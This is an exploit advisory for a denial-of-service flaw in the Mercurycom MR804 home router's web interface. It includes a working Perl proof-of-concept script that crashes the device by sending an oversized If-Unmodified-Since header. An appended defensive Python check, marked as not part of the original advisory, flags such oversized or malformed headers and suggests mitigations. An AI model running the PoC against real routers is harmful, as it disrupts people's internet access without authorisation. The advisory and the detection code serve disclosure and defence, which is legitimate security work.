Mercurycom MR804 Router Denial Of Service

Posted Feb 22, 2012
Authored by demonalex

Mercurycom MR804 Router version 3.8.1 Build 101220 Rel.53006nB suffers from a denial of service vulnerability when fed multiple HTTP headers.

tags | exploit, web, denial of service
SHA-256 | bcb466aefafb323238fa7776d12c39fca5da5fac0996900812c40f57e49cb5ef

Title: Mercurycom MR804 Router -  Multiple HTTP Header Fields Denial Of Service Vulnerability

Product : Mercurycom MR804 Router

Hardware Version : MR804 v8.0 081C3113

Software Version : 3.8.1 Build 101220 Rel.53006nB

Vendor: http://www.mercurycom.com.cn/

Class: Boundary Condition Error

CVE:

Remote: Yes

Local: No

Published: 2012-02-21

Updated:

Impact : Medium (CVSS2 Base : 6.1, AV:A/AC:L/Au:N/C:N/I:N/A:C)

Bug Description :
Mercurycom routers are commonly used for internet connectivity in homes and small offices (http://www.mercurycom.com.cn/Product/list).
The HTTP service of the Mercurycom MR804 Router contains a denial of service vulnerability in its handling of HTTP header fields (such as If-Modified-Since, If-None-Match,
If-Unmodified-Since, etc.).

POC:
#-------------------------------------------------------------
#!/usr/bin/perl -w
use Socket;
$|=1;
print '*********************************'."\n";
print '* mercurycom MR804 v8.0 DoS PoC *'."\n";
print '* writed by demonalex@163.com *'."\n";
print '*********************************'."\n";
$evil='A'x4097;
$test_ip=shift; #target ip
$test_port=shift; #target port
if(!defined($test_ip) || !defined($test_port)){
die "usage : $0 target_ip target_port\n";
}
$test_payload=
"GET / HTTP/1.0\r\n".
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"If-Unmodified-Since: ".$evil."\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: ".$test_ip."\r\n".
"Connection: Keep-Alive"."\r\n\r\n";
$test_target=inet_aton($test_ip);
$test_target=sockaddr_in($test_port, $test_target);
socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n";
connect(SOCK, $test_target) || die "cannot connect the target!\n";
send(SOCK, $test_payload, 0) || die "cannot send the payload!\n";
#recv(SOCK, $test_payload, 100, 0);
close(SOCK);
print "done!\n";
exit(1);
#-------------------------------------------------------------

Credits : This vulnerability was discovered by demonalex@163.com
mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK
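
A defensive check for the request shape shown in the PoC above, as an added example that is not part of the original advisory: it inspects a raw HTTP request head and reports header values that are oversized or, for the date-typed conditional headers, not a valid HTTP-date, as a filtering proxy or capture triage script in front of the router's management interface might. The limits (1024 bytes per value, 64 fields), the function names and the sample requests are assumptions chosen for illustration; the advisory states no threshold beyond the 4097-byte value used in the PoC.

```python
from email.utils import parsedate_to_datetime

# Assumed policy limits (not from the advisory); tune to what the device tolerates.
MAX_HEADER_VALUE = 1024
MAX_HEADER_COUNT = 64
# Conditional headers whose value must be an HTTP-date.
DATE_HEADERS = {"if-modified-since", "if-unmodified-since"}

# Constructed samples; the oversized one mirrors the header used in the PoC.
BENIGN = (b"GET / HTTP/1.0\r\nHost: 192.0.2.1\r\n"
          b"If-Unmodified-Since: Sat, 29 Oct 1994 19:43:31 GMT\r\n\r\n")
OVERSIZED = (b"GET / HTTP/1.0\r\nHost: 192.0.2.1\r\n"
             b"If-Unmodified-Since: " + b"A" * 4097 + b"\r\n\r\n")


def _is_http_date(text: str) -> bool:
    try:
        parsedate_to_datetime(text)
        return True
    except (TypeError, ValueError):  # exception type differs across Python versions
        return False


def inspect_request(raw: bytes) -> list[str]:
    """Return findings for one raw HTTP request head; an empty list means pass."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    findings = []
    if len(lines) - 1 > MAX_HEADER_COUNT:
        findings.append(f"too many header fields: {len(lines) - 1}")
    for line in lines[1:]:  # lines[0] is the request line
        name, sep, value = line.partition(b":")
        if not sep:
            findings.append("malformed header line (no colon)")
            continue
        key = name.decode("latin-1").strip().lower()
        text = value.decode("latin-1").strip()
        if len(text) > MAX_HEADER_VALUE:
            findings.append(f"{key}: value length {len(text)} exceeds {MAX_HEADER_VALUE}")
        elif key in DATE_HEADERS and not _is_http_date(text):
            findings.append(f"{key}: value is not an HTTP-date")
    return findings


if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, inspect_request(req) or "pass")
```

Requests with any finding can be dropped or logged before they reach the device; restricting the management HTTP service to trusted hosts on the LAN reduces exposure further, since the CVSS vector on this advisory is adjacent-network.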